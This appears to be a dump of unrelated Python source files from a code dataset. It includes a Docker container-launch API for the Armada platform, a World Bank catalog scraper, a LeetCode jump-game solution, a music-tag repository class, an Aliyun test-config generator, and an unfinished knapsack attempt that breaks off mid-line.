'dockyard_user': dockyard_user,\n 'dockyard_password': dockyard_password,\n 'ports': dict_ports,\n 'environment': dict_environment,\n 'volumes': dict_volumes,\n 'run_command': run_command,\n 'microservice_name': dict_environment.get('MICROSERVICE_NAME')\n }\n dict_environment['RESTART_CONTAINER_PARAMETERS'] = base64.b64encode(json.dumps(restart_parameters))\n dict_environment['ARMADA_RUN_COMMAND'] = base64.b64encode(run_command)\n microservice_name = dict_environment.get('MICROSERVICE_NAME')\n\n ports = None\n port_bindings = None\n if dict_ports:\n ports = map(int, dict_ports.values())\n port_bindings = dict((int(port_container), int(port_host))\n for port_host, port_container in dict_ports.iteritems())\n\n environment = None\n if dict_environment:\n environment = dict_environment\n\n volumes = None\n volume_bindings = None\n if dict_volumes:\n volumes = dict_volumes.values()\n volume_bindings = dict(\n (path_host, {'bind': path_container, 'ro': False}) for path_host, path_container in\n dict_volumes.iteritems())\n\n dockyard_address, image_name, image_tag = self._split_image_path(image_path)\n\n docker_api = self._get_docker_api(dockyard_address, dockyard_user, dockyard_password)\n\n self._pull_latest_image(docker_api, image_path, microservice_name)\n\n container_info = docker_api.create_container(microservice_name,\n ports=ports,\n environment=environment,\n volumes=volumes)\n long_container_id = container_info['Id']\n docker_api.start(long_container_id,\n port_bindings=port_bindings,\n publish_all_ports=True,\n privileged=True,\n binds=volume_bindings)\n\n service_endpoints = {}\n agent_self_dict = consul_query('agent/self')\n service_ip = agent_self_dict['Config']['AdvertiseAddr']\n\n docker_inspect = docker_api.inspect_container(long_container_id)\n\n for docker_port, host_address in docker_inspect['NetworkSettings']['Ports'].items():\n service_endpoints['{0}:{1}'.format(service_ip, host_address[0]['HostPort'])] = docker_port\n\n except Exception as e:\n traceback.print_exc()\n exception_msg = e.message + \" Cannot create requested container. 
{exception_class} - {exception}\".format(\n exception_class=type(e).__name__, exception=str(e))\n return self.status_error(exception_msg)\n\n short_container_id = long_container_id[:LENGTH_OF_SHORT_CONTAINER_ID]\n return self.status_ok({'container_id': short_container_id, 'endpoints': service_endpoints})\n\n def _get_docker_api(self, dockyard_address, dockyard_user, dockyard_password):\n if hasattr(self, '__docker_api') and self.__docker_api:\n return self.__docker_api\n\n docker_api = docker_client.api()\n\n if dockyard_user and dockyard_password:\n logged_in = False\n # Workaround for abrupt changes in docker-py library.\n login_exceptions = []\n registry_endpoints = ['https://{0}/v1/'.format(dockyard_address),\n 'https://{0}'.format(dockyard_address),\n dockyard_address]\n for registry_endpoint in registry_endpoints:\n try:\n docker_api.login(dockyard_user, dockyard_password, registry=registry_endpoint)\n logged_in = True\n break\n except Exception as e:\n login_exceptions.append(e)\n if not logged_in:\n for e in login_exceptions:\n print_err(e)\n raise login_exceptions[0]\n\n self.__docker_api = docker_api\n return docker_api\n\n def _pull_latest_image(self, docker_api, image_path, microservice_name):\n dockyard_address, image_name, image_tag = self._split_image_path(image_path)\n if dockyard_address:\n try:\n docker_client.docker_pull(docker_api, dockyard_address, image_name, image_tag)\n docker_api.tag(dockyard_address + '/' + image_name, microservice_name, tag=image_tag, force=True)\n except Exception as e:\n if \"ping attempt failed\" in str(e):\n raise RuntimeError(INSECURE_REGISTRY_ERROR_MSG.format(header=\"ERROR!\", address=dockyard_address))\n raise\n else:\n docker_api.tag(image_name, microservice_name, tag=image_tag, force=True)\n\n def _split_image_path(self, image_path):\n dockyard_address = None\n image_name = image_path\n image_tag = None\n\n if '/' in image_name:\n dockyard_address, image_name = image_name.split('/', 1)\n if ':' in image_name:\n image_name, image_tag = image_name.split(':', 1)\n\n return dockyard_address, image_name, image_tag\n\n def __prepare_dict_ports(self, post_data):\n ports = {}\n if post_data.get('ports'):\n ports.update(post_data.get('ports'))\n return ports\n\n def __prepare_dict_environment(self, post_data):\n environment = {}\n if post_data.get('environment'):\n environment.update(post_data.get('environment'))\n\n if post_data.get('microservice_name'):\n microservice_name = post_data.get('microservice_name')\n else:\n microservice_name = self._split_image_path(post_data['image_path'])[1]\n\n environment['MICROSERVICE_NAME'] = microservice_name\n return environment\n\n def __prepare_dict_volumes(self, post_data):\n volumes = {}\n if post_data.get('volumes'):\n volumes.update(post_data.get('volumes'))\n\n volumes[docker_client.DOCKER_SOCKET_PATH] = docker_client.DOCKER_SOCKET_PATH\n return volumes\n\n def __prepare_run_command(self, post_data):\n run_command = post_data.get('run_command')\n return run_command\n\n def POST(self):\n image_path, error = self.get_post_parameter('image_path')\n if error:\n return self.status_error(error)\n\n post_data = json.loads(web.data())\n try:\n dockyard_user = post_data.get('dockyard_user')\n dockyard_password = post_data.get('dockyard_password')\n dict_ports = self.__prepare_dict_ports(post_data)\n dict_environment = self.__prepare_dict_environment(post_data)\n dict_volumes = self.__prepare_dict_volumes(post_data)\n run_command = self.__prepare_run_command(post_data)\n except:\n traceback.print_exc()\n 
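# the full stack trace above goes to the server log; the client only gets a generic parse error\n 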
return self.status_error('API Run: Invalid input data.')\n\n return self.run_container(image_path, dockyard_user, dockyard_password, dict_ports, dict_environment,\n dict_volumes, run_command)\n","sub_path":"armada_backend/api_run.py","file_name":"api_run.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"615791110","text":"import urllib\nimport json\nimport datetime\nfrom bs4 import BeautifulSoup\nimport scraperwiki\n\n\ndef date(date):\n\ttry:\n\t\tmonths = dict()\n\t\tmonths = {'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12' }\n\t\tliste = date.split(\"-\")\n\t\tdate = liste[2] + \"-\" + months[liste[1]] + \"-\" + liste[0]\n\t\treturn date\n\texcept:\n\t\treturn \" \"\n\ndef formattext(text):\n\tsoup = BeautifulSoup(str(text.encode('utf8')))\n\td = soup.text\n\td.strip(' ')\n\treturn d\n\n\ndef scrap(url):\n\tresponse = urllib.urlopen(url)\n\tliste = json.load(response)\n\tliste = liste[\"datacatalog\"]\n\tid_=0\n\tl=[]\n\tfor li in liste:\n\t\td= {}\n\t\tll = li[\"metatype\"]\n\t\tfor dictio in ll:\n\t\t\td[dictio[\"id\"]]=dictio[\"value\"]\n\t\tl.append(d)\t\n\n\tfor li in l:\t\n\t\ttry:\n\t\t\tname = li[\"name\"]\n\t\texcept:\n\t\t\tname = \"\"\n\n\t\ttry:\n\t\t\tacronym = li[\"acronym\"]\n\t\texcept:\n\t\t\tacronym = \"\"\n\n\t\ttry:\t\n\t\t\tdescription = li[\"description\"]\n\t\texcept:\n\t\t\tdescription = \"\"\n\t\ttry:\n\t\t\turl = li[\"url\"]\n\t\texcept:\n\t\t\turl = \"\"\n\n\t\ttry:\n\t\t\ttype_ = li[\"type_\"]\n\t\texcept:\n\t\t\ttype_ = \"\"\n\n\t\ttry:\n\t\t\tlanguagesupported = li[\"languagesupported\"]\n\t\texcept:\n\t\t\tlanguagesupported = \"\"\n\n\t\ttry:\n\t\t\tperiodacity = li[\"periodacity\"]\n\t\texcept:\n\t\t\tperiodacity = \"\"\n\n\t\ttry:\n\t\t\teconomycoverage = li[\"economycoverage\"]\n\t\texcept:\n\t\t\teconomycoverage =\"\"\n\n\t\ttry:\n\t\t\tgranularity = li[\"granularity\"]\n\t\texcept:\n\t\t\tgranularity =\"\"\n\n\t\ttry:\t\n\t\t\tnumberofeconomies = li[\"numberofeconomies\"]\n\t\texcept:\n\t\t\tnumberofeconomies =\"\"\n\n\t\ttry:\n\t\t\ttopics = li[\"topics\"]\n\t\texcept:\n\t\t\ttopics =\"\"\n\n\t\ttry:\n\t\t\tupdatefrequency = li[\"updatefrequency\"]\n\t\texcept:\n\t\t\tupdatefrequency=\"\"\n\n\t\ttry:\n\t\t\tlastrevisiondate = li[\"lastrevisiondate\"]\n\t\texcept:\n\t\t\tlastrevisiondate=\"\"\n\n\t\ttry:\n\t\t\tcontactdetails = li[\"contactdetails\"]\n\t\texcept:\n\t\t\tcontactdetails=\"\"\n\n\t\ttry:\n\t\t\taccessoption = li[\"accessoption\"]\n\t\texcept:\n\t\t\taccessoption=\"\"\n\n\t\ttry:\n\t\t\tbulkdownload = li[\"bulkdownload\"]\n\t\texcept:\n\t\t\tbulkdownload=\"\"\n\n\t\ttry:\n\t\t\tcite = li[\"cite\"]\n\t\texcept:\n\t\t\tcite=\"\"\n\n\t\ttry:\n\t\t\tdetailpageurl = li[\"detailpageurl\"]\n\t\texcept:\n\t\t\tdetailpageurl=\"\"\n\n\t\ttry:\n\t\t\tcoverage = li[\"coverage\"]\n\t\texcept:\n\t\t\tcoverage=\"\"\n\n\t\ttry:\n\t\t\tmobileapp = li[\"mobileapp\"]\n\t\texcept:\n\t\t\tmobileapp=\"\"\n\n\t\tname = name.encode('ascii','ignore')\n\n\t\tdata ={\"id_\":id_,\\\n\t\t\"Name\": name,\\\n\t\t\"Acronym\":acronym,\\\n\t\t\"Description\":description,\\\n\t\t\"Url\":description,\\\n\t\t\"Type\":type_,\\\n\t\t\"languagesupported\":languagesupported,\\\n\t\t\"periodacity\":periodacity,\\\n\t\t\"economycoverage\":economycoverage,\\\n\t\t\"granularity\":granularity 
,\\\n\t\t\"numberofeconomies\":numberofeconomies,\\\n\t\t\"topics\":topics,\\\n\t\t\"updatefrequency\":updatefrequency,\\\n\t\t\"lastrevisiondate\":lastrevisiondate,\\\n\t\t\"date_clean\":date(lastrevisiondate),\\\n\t\t\"contactdetails\":contactdetails,\\\n\t\t\"accessoption\": accessoption,\\\n\t\t\"bulkdownload\":bulkdownload,\\\n\t\t\"cite\":cite,\\\n\t\t\"detailpageurl\":detailpageurl,\\\n\t\t\"coverage\":coverage,\\\n\t\t\"mobileapp\":mobileapp\n\t\t}\t\n\t\tscraperwiki.sqlite.save(unique_keys=['id_'], data = data )\n\t\tid_=id_+1\ndef main():\n\turl=\"http://api.worldbank.org/v2/datacatalog?format=json&per_page=10000\"\n\tscrap(url)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"351679346","text":"#\n# @lc app=leetcode.cn id=45 lang=python3\n#\n# [45] 跳跃游戏 II\n#\nfrom typing import *\n# @lc code=start\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n current_pos = 0\n count = 0\n while current_pos != len(nums) - 1:\n max_step = nums[current_pos]\n next_max = -1\n pos_max = -1\n if current_pos + max_step >= len(nums) - 1:\n return count + 1\n for next_pos in range(current_pos+1, \\\n current_pos + max_step + 1):\n if next_pos + nums[next_pos] > next_max:\n next_max = next_pos + nums[next_pos]\n pos_max = next_pos\n current_pos = pos_max\n count += 1\n return count\n# @lc code=end\n\na = Solution()\nprint(a.jump([1,2,1,1,1]))\n\n","sub_path":"45.跳跃游戏-ii.py","file_name":"45.跳跃游戏-ii.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"2008306","text":"from os import listdir, getlogin\n\n\nclass Repository:\n def __init__(self, version):\n \"\"\"\n Constructor:\n '__stats' is a dictionary which contains song names and the elements by which the songs are described.\n '__categories' is a list of words that are allowed to set as categories for the songs.\n \"\"\"\n self.__stats = {}\n self.__categories = [\"tag1\", \"tag2\", \"tag3\", \"tag4\", \"tag5\", \"tag6\", \"tag7\", \"tag8\", \"tag9\", \"tag10\", \"tag11\", \"tag12\", \"tag13\", \"tag14\", \"tag15\", \"tag16\", \"tag17\", \"tag18\", \"tag19\", \"tag20\", \"tag21\", \"tag22\"]\n self.version = version\n\n self.path_global = r\"C:\\Users\\{}\\Music\".format(getlogin())\n self.song_list = []\n\n def searchFiles(self, path):\n \"\"\"Loops through directories within a given path for mp3 files.\"\"\"\n for file in listdir(path):\n if file == \"iTunes\":\n continue\n try:\n self.searchFiles(path+\"\\{}\".format(file))\n except:\n if file.endswith(\".mp3\"):\n self.song_list.append(file)\n\n def getAllStats(self):\n \"\"\"Returns the dictionary of songs and their tags.\"\"\"\n return self.__stats\n\n def getCategories(self):\n \"\"\"Returns the list of possible categories.\"\"\"\n return self.__categories\n\n def loadFile(self, filename):\n \"\"\"Simply loads the resources from a file, filling the dictionary '__stats'.\"\"\"\n self.checker(filename)\n text = ''\n self.__stats.clear()\n try:\n f = open(filename, \"rb\")\n lines = f.readlines()\n for element in lines:\n text = text + str(element.decode(\"utf-8\"))\n f.close()\n for line in text.split(\"\\n\"):\n if line == \"\": continue\n name, element = line.split(\" ##\")\n if name not in self.__stats.keys():\n self.__stats[name] = element\n return \"Loaded \"+filename+\" \"\n except:\n return \"No 
such file. ERROR \"\n\n def getAllFiles(self):\n \"\"\"Returns a list of file names\"\"\"\n files = []\n [files.append(file) for file in listdir(\".\") if file.endswith(\".file\")]\n # for file in listdir(\".\"):\n # if file.endswith(\".file\"):\n # files.append(file)\n if len(files) == 0:\n f = open(\"Heal.file\", \"w\")\n f.write(\"test ## test\")\n f.close()\n files.append(\"Heal.file\")\n return files\n\n def checker(self, filename):\n \"\"\"Compares the saved file with the music folder\"\"\"\n file_melodies = []\n file_names = []\n my_melodies = []\n self.searchFiles(self.path_global)\n for file in self.song_list:\n file, _ = file.split(\".m\")\n my_melodies.append(file)\n self.song_list.clear()\n f = open(filename, \"rb\")\n lines = f.readlines()\n f.close()\n for line in lines:\n melody = line.decode(\"utf-8\").replace(\"\\n\", \"\")\n file_melodies.append(melody)\n name, _ = melody.split(\" ## \")\n file_names.append(name)\n for mel in file_melodies:\n name, _ = mel.split(\" ## \")\n if name not in my_melodies:\n file_melodies.remove(mel)\n if len(file_melodies) != len(my_melodies):\n for mel in my_melodies:\n if mel not in file_names:\n file_melodies.append(mel + \" ## \")\n file_melodies.sort()\n f = open(filename, \"wb\")\n #f.write(\"test ## test\\n\")\n [f.write((mel + \"\\n\").encode(\"utf-8\")) for mel in file_melodies]\n # for mel in file_melodies:\n # f.write((mel + \"\\n\").encode(\"utf-8\"))\n f.close()\n\n def add(self, title, element):\n \"\"\"\n Simply checks if an element given as parameter is allowed to be set as a tag for the song, which referred by title, then it adds it if valid.\n \"\"\"\n # if element not in self.__categories:\n # return (str(element) + \" is not in categories...\")\n if self.__stats[title] == \" \":\n self.__stats[title] += element\n else:\n self.__stats[title] += (\", \" + element)\n return \"Enter element to add: \"\n\n def replace(self, title, arguments):\n \"\"\"deletes all the argumets then adds the new ones\"\"\"\n self.__stats[title] = \" \"\n for arg in arguments:\n self.add(title, arg)\n\n def save(self):\n \"\"\"\n Saves the information from the dictionary '__stats' into a file named with the version plus Heal.file.\n \"\"\"\n text = ''\n # self.version += 1\n for el in self.__stats:\n if el == \"\": continue\n text += (el + \" ##\" + self.__stats[el] + \"\\n\")\n f = open(str(self.version) + \"Heal.file\", \"wb\")\n f.write(text.encode(\"utf-8\"))\n f.close()\n # f = open(\"configuration.ini\", \"r\")\n # text = f.readline().split(\" \")\n # f.close()\n # text[3] = str(self.version)\n # f = open(\"configuration.ini\", \"w\")\n # f.write(text[0]+\" \"+text[1]+\" \"+text[2]+\" \"+str(text[3]))\n # f.close()\n\n def config(self, bg, fg, pic):\n \"\"\"saves the new app configuration style in a file\"\"\"\n f = open(\"configuration.ini\", \"w\")\n f.write(bg+\" \"+fg+\" \"+pic+\" \"+str(self.version))\n f.close()\n","sub_path":"repository/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"67682154","text":"import os\nimport sys\nimport yaml\nimport logging\nfrom optparse import OptionParser\n\nREALPATH = os.path.split(os.path.realpath(__file__))[0]\nROOT_PATH = os.path.dirname(REALPATH)\n\nconfig_yaml = \"%s/config.yaml\" % ROOT_PATH\npassword_yaml = \"%s/cfg/password.yaml\" % ROOT_PATH\ncommon_yaml = \"%s/cfg/common.yaml\" % ROOT_PATH\npolarion_yaml = \"%s/cfg/polarion_config.yaml\" % 
ROOT_PATH\n\nAliyunSub = \"\"\"\\\n aliyun_access_key_id: %(aliyun_access_key_id)s\n aliyun_access_key_secret: %(aliyun_access_key_secret)s\\\n\"\"\"\n\nCommonYaml = \"\"\"\\\nCommon:\n Distro: %(distro)s\n Project: %(project)s\nCloudSub:\n%(cloud_sub)s\nRedhatSub:\n username: %(redhat_username)s\n password: %(redhat_password)s\nVMUser:\n username: %(vm_username)s\n password: %(vm_password)s\n keypairname: %(keypairname)s\nRegion:\n id: %(region_id)s\nZone:\n id: %(zone_id)s\nOSDisk:\n name: %(osdisk_name)s\n local_path: %(osdisk_local_path)s\nVM:\n name: %(vm_name_prefix)s\n instance_type: %(vm_size)s\nImage:\n name: %(image_name)s\n id: %(image_id)s\nNetwork:\n VPC:\n name: %(vpc_name)s\n id: %(vpc_id)s\n cidr: 172.17.0.0/16\n VSwitch:\n name: %(vswitch_name)s\n id: %(vswitch_id)s\n cidr: 172.17.224.0/20\nSecurityGroup:\n name: %(security_group_name)s\n id: %(security_group_id)s\nDataDisk:\n disk_number: 3\n disk1:\n size: 50\n host_caching: None\n disk2:\n size: 1023\n host_caching: ReadOnly\n disk3:\n size: 1023\n host_caching: ReadWrite\n\"\"\"\n\nTestYaml = \"\"\"\\\ntest:\n !include : common.yaml\n !include : instance_types_%(region)s.yaml\n !include : cases_%(case_group)s.yaml\n\"\"\"\n\nPolarionYaml = \"\"\"\\\nPROJECT: %(project)s\nRHEL_VERSION: %(rhel_version)s\nTYPE: %(case_group)s\nRESULT_PATH: %(result_path)s\nTAG: %(tag)s\n\"\"\"\n\n\ndef _write_file_content(filename, content):\n with open(filename, 'w') as f:\n f.write(content)\n\n\nclass Distro(object):\n def __init__(self):\n \"\"\"\n The distro structure\n \"\"\"\n self.size = None\n self.sub = None\n self.params = None\n\n\nclass CreateConfFiles(object):\n def __init__(self, data, account_data):\n \"\"\"\n :param data: Parameters dictionary. Parse the config.yaml\n :param account_data: Account parameters dictionary. 
Parse the password.yaml\n \"\"\"\n self.data = data\n self.account_data = account_data\n self.distro = data.get(\"distro\")\n self.rhel_version = None\n\n def create_common_yaml(self):\n \"\"\"\n Create common.yaml\n \"\"\"\n # Set distro specified parameters\n cloud = Distro()\n if self.distro == \"aliyun\":\n cloud.size = \"ecs.sn1.medium\"\n aliyun_sub_params = {\n \"aliyun_access_key_id\": self.account_data.get(\"AliyunSub\").get(\"aliyun_access_key_id\"),\n \"aliyun_access_key_secret\": self.account_data.get(\"AliyunSub\").get(\"aliyun_access_key_secret\")\n }\n cloud.sub = AliyunSub % aliyun_sub_params\n cloud.params = {\"keypairname\": \"wshi\",\n \"vm_username\": \"root\",\n \"vm_name_prefix\": \"aliauto\"}\n else:\n logging.error(\"No such distro: {0}\".format(self.distro))\n sys.exit(1)\n # Set common param dict\n common_yaml_dict = {\n \"distro\": self.distro,\n \"project\": self.data.get(\"project\"),\n \"cloud_sub\": cloud.sub,\n \"redhat_username\": self.account_data.get(\"RedhatSub\").get(\"username\"),\n \"redhat_password\": self.account_data.get(\"RedhatSub\").get(\"password\"),\n \"vm_username\": self.account_data.get(\"VMUser\").get(\"username\", \"\"),\n \"vm_password\": self.account_data.get(\"VMUser\").get(\"password\", \"\"),\n \"region_id\": self.data.get(\"Region\").get(\"id\"),\n \"zone_id\": self.data.get(\"Zone\").get(\"id\"),\n \"osdisk_name\": self.data.get(\"OSDisk\", {}).get(\"name\", \"\"),\n \"osdisk_local_path\": self.data.get(\"OSDisk\", {}).get(\"local_path\", \"/home/autotest/osdisk/{0}\".format(self.distro)),\n \"vm_size\": cloud.size,\n \"image_name\": self.data.get(\"Image\").get(\"name\", \"\"),\n \"image_id\": self.data.get(\"Image\").get(\"id\", \"\"),\n \"vpc_name\": self.data.get(\"VPC\").get(\"name\", \"\"),\n \"vpc_id\": self.data.get(\"VPC\").get(\"id\", \"\"),\n \"vswitch_name\": self.data.get(\"VSwitch\").get(\"name\", \"\"),\n \"vswitch_id\": self.data.get(\"VSwitch\").get(\"id\", \"\"),\n \"security_group_name\": self.data.get(\"SecurityGroup\").get(\"name\", \"\"),\n \"security_group_id\": self.data.get(\"SecurityGroup\").get(\"id\", \"\")\n }\n # Merge cloud.params into common param dict\n common_yaml_dict.update(cloud.params)\n # Wrote to file\n _write_file_content(common_yaml,\n CommonYaml % common_yaml_dict)\n return 0\n\n def create_test_yaml(self):\n \"\"\"\n Create test_asm.yaml or test_arm.yaml\n \"\"\"\n test_yaml = \"{0}/cfg/test.yaml\".format(ROOT_PATH)\n test_yaml_dict = {\n \"case_group\": self.data.get(\"case_group\", \"function\"),\n \"region\": self.data.get(\"Region\").get(\"id\", \"us-west-1\").replace('-', '')\n }\n _write_file_content(test_yaml,\n TestYaml % test_yaml_dict)\n return 0\n\n def create_polarion_config_yaml(self):\n \"\"\"\n Create polarion_config.yaml\n \"\"\"\n polarion_yaml_dict = {\n \"project\": self.data.get(\"project\"),\n \"rhel_version\": self.data.get(\"rhel_version\"),\n \"case_group\": self.data.get(\"case_group\"),\n \"result_path\": \"{0}run-results/{1}/latest\".format(self.data.get(\"store_dir\", \"/home/autotest/\"), self.distro),\n \"tag\": self.data.get(\"tag\")\n }\n _write_file_content(polarion_yaml,\n PolarionYaml % polarion_yaml_dict)\n return 0\n\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [-o ]\"\n parser = OptionParser(usage)\n# parser.add_option('-t', '--type', dest='type', action='store',\n# help='The type of the test. Default value is onpremise. 
'\n# '(onpremise/ondemand/customize)', metavar='TYPE')\n# parser.add_option('-o', '--osdisk', dest='osdisk', action='store',\n# help='The VHD OS disk name(e.g.RHEL-7.3-20161019.0-wala-2.2.0-2.vhd)', metavar='OSDISK.vhd')\n parser.add_option('-p', '--provision-only', dest='provision_only', default=False, action='store_true',\n help='Only run provision. Do not run test cases.')\n parser.add_option('-r', '--run-only', dest='run_only', default=False, action='store_true',\n help='Only run test cases. Do not provision.')\n parser.add_option('-i', '--import-only', dest='import_only', default=False, action='store_true',\n help='Only import the latest result to polarion. Do not run tests.')\n\n options, args = parser.parse_args()\n\n with open(config_yaml, 'r') as f:\n data = yaml.load(f)\n with open(password_yaml, 'r') as f:\n account_data = yaml.load(f)\n# type = options.type\n# if not type:\n# type = data.get(\"type\", None)\n# if not type:\n# parser.print_help()\n# parser.error(\"The type must be specified.\")\n createFile = CreateConfFiles(data, account_data)\n ret = 0\n if options.provision_only:\n pass\n elif options.run_only:\n ret += createFile.create_common_yaml()\n ret += createFile.create_test_yaml()\n elif options.import_only:\n ret += createFile.create_polarion_config_yaml()\n else:\n ret += createFile.create_common_yaml()\n ret += createFile.create_test_yaml()\n ret += createFile.create_polarion_config_yaml()\n sys.exit(ret)\n","sub_path":"tools/create_conf.py","file_name":"create_conf.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"238171102","text":"#아직 푸는 중...미완성\n\nn,k = map(int, input().split())\n\nobject = []\nfor i in range(0,n):\n w,v=map(int,input().split())\n object.append((w,v))\ndp = [[0]*(k+1) for _ in range(n+1)]\n\n\n'''\nfor i in range(0,n):\n if (dp[i][1]+object[i][0])<=k:\n a=int(dp[0]+object[i][0])\n b=int(dp[1]+object[i][1])\n dp.append((a,b))\n maximum=max(dp[i][1],dp[i-1][1])\n\n\nprint(maximum)\n'''\nfor i in range(1,n+1):\n for j in range(1,k+1):\n w=object[i][0]\n v=object[i][1]\n if j